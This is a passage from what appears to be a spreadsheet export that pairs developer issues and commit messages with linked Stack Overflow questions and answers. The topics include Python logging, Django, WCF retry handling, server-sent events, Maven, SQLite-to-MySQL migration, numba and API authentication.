&lt;p&gt;I would expect that the color for the &amp;quot;INFO&amp;quot; level will be same as sysout or at least some neuetral color. But the output of the run of my script is:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/KPNLCT5G.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/KPNLCT5G.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I would like the &amp;quot;INFO&amp;quot; logs to be in at least same color as the one coming from &amp;quot;print&amp;quot;.  I have tried to add config like this:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;logging.basicConfig(level=logging.DEBUG,  format=&amp;quot;%(asctime)s - %(levelname)s - %(message)s&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this did not help. I do not want to setup &amp;quot;loggers&amp;quot; for my project because using simple &amp;quot;logging&amp;quot; is more convienient for me.&lt;/p&gt;
&lt;p&gt;In the real project which I am developing I have several classes where I use all the levels and many log messages, so this RED info logs makes the whole logs very unreadable.&lt;/p&gt;
&lt;p&gt;I cannot believe that its normal for the INFO log to be red, but as you see I dont have any special configs. How I can easily configre the &amp;quot;logging&amp;quot; to have proper colouring?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C86</t>
  </si>
  <si>
    <t>Fixed issue: when using Django Authentication Views and logging out, the admin logout template was used instead. Placed &lt;'django.contrib.admin',&gt; at the end of the INSTALLED_APPS list. Found the solution here: https://stackoverflow.com/questions/15467831/django-logout-redirects-me-to-administration-page
Added User Registration and messages. Will refine them all further.
Added profile fields (what I call character) to expand the user model.</t>
  </si>
  <si>
    <t>If you are seeing the log out page of the Django administration site instead of your own log out page (your_application/templates/registration/logged_out.html), check the INSTALLED_APPS setting of your project and make sure that django.contrib.admin comes after your_application. Both templates are located in the same relative path and the Django template loader will use the first one it finds.</t>
  </si>
  <si>
    <t>Fixed issue: when using Django Authentication Views and logging out, 
the admin logout template was used instead. Placed &lt;'django.contrib.admin',&gt; at the end of the INSTALLED_APPS list. Found the solution here: https://stackoverflow.com/questions/15467831/django-logout-redirects-me-to-administration-page
Added User Registration and messages. Will refine them all further.
Added profile fields (what I call character) to expand the user model.</t>
  </si>
  <si>
    <t xml:space="preserve">What is the architectural reason for the column names prefixed with "Lowered" in the SQL schema for ASP.Net membership and friends?  Some examples of the columns in question are below:
aspnet_Applications.LoweredApplicationName 
aspnet_users.LoweredUserName
aspnet_membership.LowerEmail
I see that the lowered columns are indexed, but it seems to me that you could just index the associated non-lowered column and leave out the apparent duplication.
I'm sure there is a good reason for them to exist, but I can't figure it out.
</t>
  </si>
  <si>
    <t>C860</t>
  </si>
  <si>
    <t>Expand delayed/duplicate token handling approach #9785
surfaces an alternative approach to deal with multiple change events. The current approach in the topic+sample uses file hashes (duplicate handling) and an exponential back-off (delay handling). Let's consider revising the current approach or adding the alternate approach. If we add a new approach, we'll add it into the topic (and possibly sample app) over cross-linking. Keep an eye on the issue, as engineering may take it on in a future release.
Let's look at this early next year. We need to get past 2.2 RTM and a few other high priority issues.
I think from glancing there might be a possible issue with that hack! From glancing, if InvokeChanged() method is fired in parallel, then your if check can be entered into by multiple threads at once (as no locking is used) so your logic could run more than once:
 if (!_appsettingsHash.SequenceEqual(appsettingsHash) || 
                !_appsettingsEnvHash.SequenceEqual(appsettingsEnvHash))
            {
                _appsettingsHash = appsettingsHash;
                _appsettingsEnvHash = appsettingsEnvHash;
                WriteConsole("Configuration changed (Simple Startup Change Token)");
            }. That aside (I appreciate this is just a hack to give the developer an idea - but that leads into my next point), may I formally lodge an expression of my discontent over the way this issue has been chucked over the fence from engineering. Without any tests in place, and only a link to a suggested hack (sorry - just using your terminology here, it's not a dig at your work!), it appears almost like this issue has not really been taken too seriously by engineering. Let me qualify that: It's a known issue that they are happy to leave in the framework, to be worked around by everyone who hits it, and people will hit it. When they do, even though official workarounds could be provided that have test coverage on the engineering side, it's left instead to your hack, which... may have issues, and therefore the developer will have to write their own implementation in the spirit of your solution, rather than adopting something that is already robust for solving this issue.
I also think that this example of debouncing change tokens based on re-reading the file and computing a hash, may be ok in some situations, but likely not all. It has undesirable characteristics especially when scaling. Could it be worth noting these issues with it in the docs?
In a web farm scenario (say scaling on Azure App Service) - if monitoring for a change to a central config file, when that file changes, all nodes in the cluster (which could be very large) will all attempt to re-open the changed file at the same time, and read it to compute a new hash. This places a sudden load on the file system (and accross the network if using network based storage), that could be avoided with other approaches.
If the file is quite large, this magnifies the problem even more, and I am also guessing the it will take longer to compute the hash. Perhaps too long? https://stackoverflow.com/questions/3837737/improve-performance-of-sha-1-computehash</t>
  </si>
  <si>
    <t>The first question is what you need this checksum for. If you don't need the cryptographic properties, then a non-cryptographic hash, or a hash that is less cryptographically secure (MD5 being "broken" doesn't prevent it being a good hash, nor still strong enough for some uses) is likely to be more performant. You could make your own hash by reading a subset of the data (I'd advise making this subset work in 4096byte chunks of the underlying file, as that would match the buffer size used by SHA1Managed as well as allowing for a faster chunk read than you would if you did say every X bytes for some value of X).
Edit: An upvote reminding me of this answer, has also reminded me that I since wrote
SpookilySharp
which provides high-performance 32-, 64- and 128-bit hashes that are not cryptographic, but good for providing checksums against errors, storage, etc. (This in turn has reminded me that I should update it to support .NET Core).
Of course, if you want the SHA-1 of the file to interoperate with something else, you are stuck.
I would experiment with different buffer sizes, as increasing the size of the filestream's buffer can increase speed at the cost of extra memory. I would advise a whole multiple of 4096 (4096 is the default, incidentally) as SHA1Managed will ask for 4096 chunks at a time, and this way there'll be no case where either FileStream returns less than the most asked for (allowed but sometimes suboptimal) or does more than one copy at a time.</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to hear your opinions and maybe better suggestions for the following scenario:
I have define a custom ActionFilter that does some job and comes out with some value. I would like to use that value in controller actions and in models.
Now, I could use TempData to pass this value from the ActionFilter to any controller action method, then distribute this value over to all models that get passed to returned views.
I'm sure it will work but this TempData will be there in session where and when nobody actually needs it anymore. The value is supposed to be used exclusively in the code during the time of a single request after which it effectively invalidates.
I have come up with two options:
In ActionFilter, I set this value in TempData in OnActioExecuting() and I remove it in OnActionExecuted(). Do I understand it correctly that by the time OnActionExecuted is called, the controller action has finished, the response has already been generated and this TempData content hasn't made its way to the session YET?
In any of my custom static classes (logic) I just define a public property for this value and I use it whenever needed. Will this static field not be lost between OnActionExecuting() and actually executing the controller method? Are there any other issues with possible loosing this value during the request processing on the server?
Are there any other/better options I havem't considered yet?
</t>
  </si>
  <si>
    <t>C861</t>
  </si>
  <si>
    <t>Describe the problem
Currently we need to use @tauriApps/plugin-websocket for unidirectional streaming (from server to client). However, there is another web standard specifically for such unidirectional streaming: Server Sent Events (SSE).
Describe the solution you'd like
Would be nice to also have @tauriApps/plugin-sse to support "server sent events".
Especially for mobile applications, SSE is a much more energy-saving alternative. Btw, in contrast to the use of the "web's native implementation", Tauri can even improve SSE communication by
optionally bypassing a "push proxy" (https://stackoverflow.com/questions/46799463/server-sent-events-sse-connection-loss-on-mobile-phones)
leaving SSE communication intact for the native application, use the native timer for SSE retry field (instead of the web timer)
enabling GZIP compression of SSE message</t>
  </si>
  <si>
    <t>Your connection was probably taken by a "push proxy" - a feature that is designed to improve battery life in phones.
Quote from "https://html.spec.whatwg.org/multipage/server-sent-events.html":
User agents running in controlled environments, e.g. browsers on
mobile handsets tied to specific carriers, may offload the management
of the connection to a proxy on the network. In such a situation, the
user agent for the purposes of conformance is considered to include
both the handset software and the network proxy.
For example, a browser on a mobile device, after having established a
connection, might detect that it is on a supporting network and
request that a proxy server on the network take over the management of
the connection. The timeline for such a situation might be as follows:
Browser connects to a remote HTTP server and requests the resource specified by the author in the EventSource constructor.
The server sends occasional messages.
In between two messages, the browser detects that it is idle except for the network activity involved in keeping the TCP connection alive,
and decides to switch to sleep mode to save power.
The browser disconnects from the server.
The browser contacts a service on the network, and requests that the service, a "push proxy", maintain the connection instead.
The "push proxy" service contacts the remote HTTP server and requests the resource specified by the author in the EventSource
constructor (possibly including a
Last-Event-ID
HTTP header, etc).
The browser allows the mobile device to go to sleep.
The server sends another message.
The "push proxy" service uses a technology such as OMA push to convey the event to the mobile device, which wakes only enough to
process the event and then returns to sleep.
This can reduce the total data usage, and can therefore result in
considerable power savings.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to get Preline UI to work with a prefix. I found this issue here:
&lt;a href="https://stackoverflow.com/questions/79331066/preline-ui-offcanvas-not-working-when-tailwind-prefix-is-applied"&gt;preline ui offcanvas not working when tailwind prefix is applied&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;which solves the problem for an &lt;a href="https://preline.co/docs/offcanvas.html" rel="nofollow noreferrer"&gt;offcanvas&lt;/a&gt;. I tried to use it to generalize to other things such as selects or dropdowns, but with no luck.&lt;/p&gt;
&lt;p&gt;This issue is not related to Tailwind CSS, because all of tailwind's classes work well with a prefix. It's only preline's classes (the &lt;code&gt;hs-&lt;/code&gt; classes).&lt;/p&gt;
&lt;h3&gt;Example:&lt;/h3&gt;
&lt;p&gt;This works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div class=&amp;quot;hs-dropdown [--placement:bottom-right] relative inline-flex&amp;quot;&amp;gt;
  &amp;lt;button id=&amp;quot;@@id&amp;quot; type=&amp;quot;button&amp;quot; class=&amp;quot;size-7 inline-flex justify-center items-center gap-x-2 rounded-lg border border-transparent text-gray-500 hover:bg-gray-100 disabled:opacity-50 disabled:pointer-events-none focus:outline-none focus:bg-gray-200 dark:text-neutral-400 dark:hover:bg-neutral-700 dark:focus:bg-neutral-700&amp;quot; aria-haspopup=&amp;quot;menu&amp;quot; aria-expanded=&amp;quot;false&amp;quot; aria-label=&amp;quot;Dropdown&amp;quot;&amp;gt;
    &amp;lt;svg class=&amp;quot;shrink-0 size-4&amp;quot; xmlns=&amp;quot;http://www.w3.org/2000/svg&amp;quot; width=&amp;quot;24&amp;quot; height=&amp;quot;24&amp;quot; viewBox=&amp;quot;0 0 24 24&amp;quot; fill=&amp;quot;none&amp;quot; stroke=&amp;quot;currentColor&amp;quot; stroke-width=&amp;quot;2&amp;quot; stroke-linecap=&amp;quot;round&amp;quot; stroke-linejoin=&amp;quot;round&amp;quot;&amp;gt;&amp;lt;circle cx=&amp;quot;12&amp;quot; cy=&amp;quot;12&amp;quot; r=&amp;quot;1&amp;quot;/&amp;gt;&amp;lt;circle cx=&amp;quot;12&amp;quot; cy=&amp;quot;5&amp;quot; r=&amp;quot;1&amp;quot;/&amp;gt;&amp;lt;circle cx=&amp;quot;12&amp;quot; cy=&amp;quot;19&amp;quot; r=&amp;quot;1&amp;quot;/&amp;gt;&amp;lt;/svg&amp;gt;
  &amp;lt;/button&amp;gt;
  &amp;lt;div class=&amp;quot;hs-dropdown-menu absolute top-full right-0 hs-dropdown-open:opacity-100 w-40 transition-[opacity,margin] duration opacity-0 hidden z-10 bg-white rounded-xl shadow-[0_10px_40px_10px_rgba(0,0,0,0.08)] dark:shadow-[0_10px_40px_10px_rgba(0,0,0,0.2)] dark:bg-neutral-900&amp;quot; role=&amp;quot;menu&amp;quot; aria-orientation=&amp;quot;vertical&amp;quot; aria-labelledby=&amp;quot;@@id&amp;quot;&amp;gt;
    &amp;lt;div class=&amp;quot;p-1&amp;quot;&amp;gt;
      &amp;lt;button type=&amp;quot;button&amp;quot; class=&amp;quot;w-full flex items-center gap-x-3 py-1.5 px-2 rounded-lg text-[13px] font-normal text-gray-800 hover:bg-gray-100 disabled:opacity-50 disabled:pointer-events-none focus:outline-none focus:bg-gray-100 dark:text-neutral-300 dark:hover:bg-neutral-800 dark:focus:bg-neutral-800&amp;quot; data-hs-overlay=&amp;quot;#hs-pro-detm&amp;quot;&amp;gt;
        &amp;lt;svg class=&amp;quot;shrink-0 size-3.5&amp;quot; xmlns=&amp;quot;http://www.w3.org/2000/svg&amp;quot; width=&amp;quot;24&amp;quot; height=&amp;quot;24&amp;quot; viewBox=&amp;quot;0 0 24 24&amp;quot; fill=&amp;quot;none&amp;quot; stroke=&amp;quot;currentColor&amp;quot; stroke-width=&amp;quot;2&amp;quot; stroke-linecap=&amp;quot;round&amp;quot; stroke-linejoin=&amp;quot;round&amp;quot;&amp;gt;&amp;lt;path d=&amp;quot;M17 3a2.85 2.83 0 1 1 4 4L7.5 20.5 2 22l1.5-5.5Z&amp;quot;/&amp;gt;&amp;lt;path d=&amp;quot;m15 5 4 4&amp;quot;/&amp;gt;&amp;lt;/svg&amp;gt;
        Edit team
      &amp;lt;/button&amp;gt;
    &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This doesn't:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div class=&amp;quot;hs-dropdown [--placement:bottom-right] had-relative had-inline-flex  [&amp;amp;.open]:had-translate-x-0 &amp;quot;&amp;gt;
  &amp;lt;button id=&amp;quot;@@id&amp;quot; type=&amp;quot;button&amp;quot; class=&amp;quot;had-size-7 had-inline-flex had-justify-center had-items-center had-gap-x-2 had-rounded-lg had-border had-border-transparent had-text-gray-500 hover:had-bg-gray-100 disabled:had-opacity-50 disabled:had-pointer-events-none focus:had-outline-none focus:had-bg-gray-200 dark:had-text-neutral-400 dark:hover:had-bg-neutral-700 dark:focus:had-bg-neutral-700&amp;quot; aria-haspopup=&amp;quot;menu&amp;quot; aria-expanded=&amp;quot;false&amp;quot; aria-label=&amp;quot;Dropdown&amp;quot;&amp;gt;
    &amp;lt;svg class=&amp;quot;shrink-0 size-4&amp;quot; xmlns=&amp;quot;http://www.w3.org/2000/svg&amp;quot; width=&amp;quot;24&amp;quot; height=&amp;quot;24&amp;quot; viewBox=&amp;quot;0 0 24 24&amp;quot; fill=&amp;quot;none&amp;quot; stroke=&amp;quot;currentColor&amp;quot; stroke-width=&amp;quot;2&amp;quot; stroke-linecap=&amp;quot;round&amp;quot; stroke-linejoin=&amp;quot;round&amp;quot;&amp;gt;&amp;lt;circle cx=&amp;quot;12&amp;quot; cy=&amp;quot;12&amp;quot; r=&amp;quot;1&amp;quot;/&amp;gt;&amp;lt;circle cx=&amp;quot;12&amp;quot; cy=&amp;quot;5&amp;quot; r=&amp;quot;1&amp;quot;/&amp;gt;&amp;lt;circle cx=&amp;quot;12&amp;quot; cy=&amp;quot;19&amp;quot; r=&amp;quot;1&amp;quot;/&amp;gt;&amp;lt;/svg&amp;gt;
  &amp;lt;/button&amp;gt;
  &amp;lt;div class=&amp;quot;hs-dropdown-menu had-absolute had-top-full had-right-0 hs-dropdown-open:opacity-100 had-w-40 had-transition-[opacity,margin] had-duration had-opacity-0 had-hidden had-z-10 had-bg-white had-rounded-xl had-shadow-[0_10px_40px_10px_rgba(0,0,0,0.08)] dark:had-shadow-[0_10px_40px_10px_rgba(0,0,0,0.2)] dark:had-bg-neutral-900&amp;quot; role=&amp;quot;menu&amp;quot; aria-orientation=&amp;quot;vertical&amp;quot; aria-labelledby=&amp;quot;@@id&amp;quot; data-hs-overlay-options='{&amp;quot;hiddenClass&amp;quot;:&amp;quot;had-hidden&amp;quot;}'&amp;gt;
    &amp;lt;div class=&amp;quot;p-1&amp;quot;&amp;gt;
      &amp;lt;button type=&amp;quot;button&amp;quot; class=&amp;quot;had-w-full had-flex had-items-center had-gap-x-3 had-py-1.5 had-px-2 had-rounded-lg had-text-[13px] had-font-normal had-text-gray-800 hover:had-bg-gray-100 disabled:had-opacity-50 disabled:had-pointer-events-none focus:had-outline-none focus:had-bg-gray-100 dark:had-text-neutral-300 dark:had-hover:bg-neutral-800 dark:had-focus:bg-neutral-800&amp;quot; data-hs-overlay=&amp;quot;#hs-pro-detm&amp;quot;&amp;gt;
        &amp;lt;svg class=&amp;quot;shrink-0 size-3.5&amp;quot; xmlns=&amp;quot;http://www.w3.org/2000/svg&amp;quot; width=&amp;quot;24&amp;quot; height=&amp;quot;24&amp;quot; viewBox=&amp;quot;0 0 24 24&amp;quot; fill=&amp;quot;none&amp;quot; stroke=&amp;quot;currentColor&amp;quot; stroke-width=&amp;quot;2&amp;quot; stroke-linecap=&amp;quot;round&amp;quot; stroke-linejoin=&amp;quot;round&amp;quot;&amp;gt;&amp;lt;path d=&amp;quot;M17 3a2.85 2.83 0 1 1 4 4L7.5 20.5 2 22l1.5-5.5Z&amp;quot;/&amp;gt;&amp;lt;path d=&amp;quot;m15 5 4 4&amp;quot;/&amp;gt;&amp;lt;/svg&amp;gt;
        Edit team
      &amp;lt;/button&amp;gt;
    &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the documentation I can't find any solution to prefixes. They generally state how to add them for tailwind
&lt;a href="https://preline.co/docs/configuration.html#prefix" rel="nofollow noreferrer"&gt;https://preline.co/docs/configuration.html#prefix&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Is there any generalized solution to this? I want to apply it to all elements that contain hs- classes&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C862</t>
  </si>
  <si>
    <t>Problem...
While investigating #210 a long term error came in the spotlight again The communication object, System.ServiceModel.Channels.ServiceChannel, cannot be used for communication because it is in the Faulted state. This issue is continuation of #214 which was mostly written by "Copilot", an okay code change based on the available analysis. However, unfortunately the analysis was incomplete and the error is still there. To keep #214 and its matching Pull Request by "Copilot" clean decided to continue in this sibling issue.
Analysis 20251023
I had a PowerShell.exe and pwsh.exe open for weeks over hibernation, occasional Get-IshUser cmdlet was very reliable confirming #210
However the EventHandler code changes from this issue are still leaky using combination of client 8.2.13016.246 and server 15.2.1806.0 on Windows PowerShell and cross-platform PowerShell as I got https://stackoverflow.com/questions/75993091/how-do-i-implement-retries-for-wcf-clients holds an interesting read regarding retry logic upon TimeoutException and CommunicationException exceptions. Note that DispatchProxy is not available in .NET Framework 4.8. A complicated pattern.</t>
  </si>
  <si>
    <t>In case of HttpClient the AddPolicyHandler registers a PolicyHttpMessageHandler, which is a DelegatingHandler. It basically overrides the SendAsync:
Task&lt;HttpResponseMessage&gt; SendAsync(
    HttpRequestMessage request, CancellationToken cancellationToken);
I haven't used WCF for awhile but if my memory serves well then the closest thing to this is the client message interceptor ( IClientMessageInterceptor). Even though it is feasible unfortunately it is not that easy to achieve.
Another alternative could be to use RealProxy. Basically here you can override the Invoke method and decorate the MethodBase's Invoke call with a policy which triggers for TimeoutException and CommunicationException. The problem with this approach is that RealProxy is not available in .NET Core (or its successor).
So, the only option is to wrap yourself the method calls. This can be done
either with a generic static method (in your example the RetryOnTimeout)
or by creating a custom ClientBase derived class
class ResilientSampleClient: ClientBase&lt;ISampleClient&gt;, ISampleClient
{
    private readonly IRetryPolicy retryPolicy = Policy
            .Handle&lt;TimeoutException&gt;()
            .Or&lt;CommunicationException&gt;()
            .WaitAndRetry(3, _ =&gt; TimeSpan.FromSeconds(1));
    public ResilientSampleClient(): base(binding, endpointAddress) {}
    public void MethodToRetryOnTimeout()     
       =&gt; retryPolicy.Execute(base.Channel.MethodToRetryOnTimeout);     
}
UPDATE #1
After spending a bit more time on RealProxy I've bumped into this migration article. It suggests to use DispatchProxy instead.
I haven't tested this code, but based on the migration doc the above RealProxy based solution could be rewritten like this:
public class WcfClientProxy&lt;T&gt; : DispatchProxy where T : class
{
    private readonly IRetryPolicy retryPolicy = Policy
            .Handle&lt;TimeoutException&gt;()
            .Or&lt;CommunicationException&gt;()
            .WaitAndRetry(3, _ =&gt; TimeSpan.FromSeconds(1));
    private readonly WcfChannelFactory&lt;T&gt; _channelFactory;
    public WcfClientProxy(WcfChannelFactory&lt;T&gt; channelFactory) : base()
    {
        this._channelFactory = channelFactory;
    }
    public override object Invoke(MethodInfo targetMethod, object[] args)
    {
        return retryPolicy.Execute(() =&gt; targetMethod.Invoke(this._channelFactory.CreateBaseChannel(), args));
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to build a very light re-usable framework for my games, rather than starting from scratch each time I start a game. I have a component driven architecture - e.g. Entity composes a Position component and a Health component and Ai component etc. 
My big question is whether my model composes view components to allow for more than one view of the model, or whether to use a truer MVC where the model does not know about its views, and they are managed externally.
I have tried both methods but if anyone knows the pros and cons of each approach and which is the industry standard, it would be great to know.
</t>
  </si>
  <si>
    <t>C863</t>
  </si>
  <si>
    <t xml:space="preserve"> Problem...
While investigating #210 a long term error came in the spotlight again The communication object, System.ServiceModel.Channels.ServiceChannel, cannot be used for communication because it is in the Faulted state.
Workaround...
This illusive error is mentioned in the README.MD section 'Known Issues &amp; FAQ' for years as
If a test fails with The communication object, System.ServiceModel.Channels.ServiceChannel, cannot be used for communication because it is in the Faulted state., it probably means you didn't provide enough (mandatory) parameters to the WCF/SVC code so passing null parameters. Typically an -IshPassword is missing or using an existing username.
Mostly indicating that some sort of authentication parameters or the refresh or expire caused. And indeed a New-IshSession (often with exactly the same parameters) made it functional again.
Analysis
After rewrite of Refresh Token, see #210, you can still get the error, actually unrelated code. In essence it means that something in the Windows Communication Foundation (WCF) connection went wrong. This can be misbehaving server-side API code, application recycle over networking devices up to the client.
Classes like InfoShareWcfSoapWithOpenIdConnectConnection contain an if clause like below for years that is checked for every Get...Channel() call.
(_annotationClient.InnerChannel.State == System.ServiceModel.CommunicationState.Faulted)
Below analysis indicates that this considered unused code that does not trigger at the right moment in time.
Actions...
Right after every _annotationServiceReference CreateChannel-creation in NET48 and NET60+ code, a specific register event needs to happen like ((ICommunicationObject)_annotationClient).Faulted+= new EventHandler(AnnotationClientChannelFactoryFaulted); that hooks up  https://stackoverflow.com/questions/5464195/handle-persistent-wcf-client-entering-faulted-state hints to adding client.ChannelFactory.Faulted += new EventHandler(ChannelFactory_Faulted); in turn all rebuild code plus how to not loop this code forever</t>
  </si>
  <si>
    <t>To answer your question, you can handle the
Faulted event
of the ChannelFactory property like this:
client.ChannelFactory.Faulted += new EventHandler(ChannelFactory_Faulted);
That should allow you to perform whatever logging/cleanup that you need to do.
As a general recommendation, you should not leave the channel open for the duration of the session, so make sure you are closing the channel properly (aborting upon exception) after you're finished with it.
Also, if possible, consider NOT using the Visual Studio Add Service Reference, or at the very least cleaning up the code/config it generates. I recommend that if you want to use a proxy implementation, create your own by deriving from
ClientBase
, or use a
ChannelFactory
implementation. Since you mention a wrapper class, I would recommend that you use a ChannelFactory and handle the
Faulted event
for your cleanup needs.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Txt files larger than 10 KB are not displayed in MDLabel. Just a black empty screen is displayed. Why is this happening?&lt;/p&gt;
&lt;p&gt;They are displayed via MDTextField, but there is no markup. So this does not suit me.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MDLabel:
    id: content_label
    text: &amp;quot;file.txt&amp;quot;
    text_color: 1, 1, 1, 1
    markup: True
    size_hint_y: None
    height: self.texture_size[1]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I expected that a txt file larger than 10 KB would be displayed via mdlabel, but this did not happen. Smaller files are displayed fine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C864</t>
  </si>
  <si>
    <t>[MNG-6523] System Dependencies Deprecation #7326
Closed as not planned
@jira-importer
Description
jira-importer
opened on Nov 20, 2018
Alireza Fattahi opened MNG-6523 and commented
Please let me know if this is wrong place for discussions about this.
As mentioned in https://maven.apache.org/guides/introduction/introduction-to-dependency-mechanism.html#System_Dependencies the System Dependencies will be depreciated and should not be used.
Well this feature seems very useful in some cases and must developers find it easy to use:
https://stackoverflow.com/a/4491469/2648077
https://stackoverflow.com/a/22300875/2648077</t>
  </si>
  <si>
    <t>One of the possible solutions is to put your dependencies in src/main/resources, and then in your POM file:
&lt;dependency&gt;
    groupId ...
    artifactId ...
    version ...
    &lt;scope&gt;system&lt;/scope&gt;
    &lt;systemPath&gt;${project.basedir}/src/main/resources/yourJar.jar&lt;/systemPath&gt;
&lt;/dependency&gt;
Note: System dependencies are not copied into resulting JAR/WAR file (see https://stackoverflow.com/questions/19065666/how-to-include-system-dependencies-in-a-war-file-built-using-maven)</t>
  </si>
  <si>
    <t xml:space="preserve">How do you commonly lay out your solutions in Visual Studio? Recently, I've kept the BLL, DAL and presentation in different classes and planned to add a test solution as I learn TDD. However, after recently watching a video from Rob Conery and viewing a project from an external contractor, I noticed a theme of multiple projects in the solution. 
The projects included in the solution were:
Infrastructure
Model 
Web  
Tests
SQL Repository
Is this something new or a design technique suggested for MVC? Can anybody tell me more about this design?
</t>
  </si>
  <si>
    <t>C865</t>
  </si>
  <si>
    <t>Creating a new issue as discussed today at Shepherd meeting and all-hands meeting.
This is highly related to #2524 but creating a new issues as we may be changing course.
Regarding the method for making our resource databases available to ARAX:
While we initially suggested EFS, we have recently pursued EBS multi-attach (see #2524 ), there may be a fatal flaw in both of these approaches. it seems that EBSma or EFS can only be mounted by instances with the same account/org.
If we want to attach EBS to arax.ncats.io, we'll need ITRB to set up EBSma under their account (currently trying to set this up, a bit slow going)
But that won't help us while we're testing on shepherd.rtx.ai. We'd need another EBSma instance that is mountable from that machine
And neither of those will work for Max's instance shepherd.renci.org, so that will probably need another EBSma for ARAX to work there
For any instance of Shepherd that anyone wants to spin up, there will need to and EBS instance available under the same account. That needs to be populated
To those present at the calls of 2025-09-03, this seemed like an untenable position to be in. EFS and EBSma do not seem to present the "public read-only disk" concept that we thought was a good idea to pursue.
We are seriously considering abandoning the EBSma/EFS idea and switching to a MySQL instance that can expose its port to anyone who requests it or to the world (what are the security implications of this?)
It would seem relatively straightforward to convert the SQLite databases to MySQL databases via something like this:
https://stackoverflow.com/questions/18671/quick-easy-way-to-migrate-sqlite3-to-mysql
Then we would adjust ARAX code to access this external MySQL server via its Internet port instead of a SQLite file, which is presumed to be fairly easy.
Since Steve and others were not present for this discussion, it is being moved here to a GitHub issue. Please review and ponder and post your comments and ideas, and then we will try to schedule an all-interested-hands meeting to make a decision if we should proceed.</t>
  </si>
  <si>
    <t>Here is a list of converters (not updated since 2011):
https://www2.sqlite.org/cvstrac/wiki?p=ConverterTools
(or
snapshot at archive.org
)
An alternative method that would work nicely but is rarely mentioned is: use an ORM class that abstracts specific database differences away for you.  e.g. you get these in PHP (
RedBean
), Python (Django's ORM layer,
Storm
,
SqlAlchemy
), Ruby on Rails (
ActiveRecord
), Cocoa (
CoreData
)
i.e. you could do this:
Load data from source database using the ORM class.
Store data in memory or serialize to disk.
Store data into destination database using the ORM class.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I once used a library called njit from numba to improve the speed of calculations in Python. Suddenly I got a wrong answer. At the same time, if I do not use njit, my code gives a correct answer.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from numba import njit
@njit
def main_with_njit():
    a = 94906267
    print(f'main_with_njit: a**2 = {a ** 2}')  # -&amp;gt; a**2 = 9007199515875288
main_with_njit()
def main_without_njit():
    a = 94906267
    print(f'main_without_njit: a**2 = {a ** 2}')  # -&amp;gt; a**2 = 9007199515875289
main_without_njit()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I use njit without getting a wrong answer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C866</t>
  </si>
  <si>
    <t>use basic auth to secure transactions on server side
use basic auth to secure transactions on app side
 use provided user login to authentication
 handle 401 and other possible errors
 give only offiers and informants access to the rest interface
Things to deal with when using basic auth
In order to use the service, the client needs to keep the password somewhere in clear text to send it along with each request.
The verification of a password should be very slow (to counter brute force attacks), which would hamper scalability of your service. On the other hand, security token validation can be quick
source: http://softwareengineering.stackexchange.com/questions/290511/auth-options-for-distributed-systems/291030#291030</t>
  </si>
  <si>
    <t>There are many reasons not to use basic authentication scheme to protect Web API services.
In order to use the service, the client needs to keep the password somewhere in clear text to send it along with each request.
The verification of a password should be very slow (to counter brute force attacks), which would hamper scalability of your service. On the other hand, security token validation can be quick (digital signature verification).
OAuth2
does offer solutions for each of your use cases. Your web application can use the
code grant
, which gives it an access token it can use to talk to your API.
Your web application will redirect the user's browser to the authorization server. It will prompt the user for credentials (or smart card, or two-factor auth code) and return a code to the browser, which the client (your web application) can use to get an access token from the authorization server.
Your application will also get back a refresh token with which it can get a new access token if the current token expires.
Your CLI application can use the
resource owner credentials grant
. You will prompt the user for credentials and submit them to the authorization server to acquire an access and refresh token. Once your CLI application has the token, you can discard the user's password in memory.
Both clients (web app and command-line client) need to be registered up front with the authorization server.
Your authorization server may well talk to a LDAP/directory service (identity provider or IdP) to do the actual authentication.
Your web API service only needs to verify the incoming JWT token and establish what the user is allowed to do (authorization).
If you are the victim of a man-in-the-middle attack and you lose your access token, the attacker only has a limited time (token lifetime) to use it. A password is typically valid for much longer. Refresh tokens can be revoked in case they get lost.</t>
  </si>
  <si>
    <t xml:space="preserve">One part of domain-driven design that there doesn't seem to be a lot of detail on, is how and why you should isolate your domain model from your interface. I'm trying to convince my colleagues that this is a good practice, but I don't seem to be making much headway...
They use domain entities where ever they please in the presentation and interface layers. When I argue to them that they should be using display models or DTOs to insulate the Domain layer from the interface layer, they counter that they don't see the business value in doing something like that, because now you have a UI object to maintain as well as the original domain object.  
So I'm looking for some concrete reasons I can use to back this up. Specifically:
Why should we not use domain objects in our presentation layer?
(if the answer is the obvious one, 'decoupling', then please explain why this is important in this context)
Should we use additional objects or constructs to isolate our domain objects from the interface?
</t>
  </si>
  <si>
    <t>C867</t>
  </si>
  <si>
    <t>Support worker-dedicated listening queues (SO_REUSEPORT) (#369)
This performance optimization has a few cons, including security
concerns, but it improves CPU core utilization/balance in many SMP
environments and is supported by many high-performance servers. Enabled
by the new `*_port worker-queues` configuration option.
Worker-dedicated listening queues reduce client-worker affinity for
requests submitted over different TCP connections. The effect of that
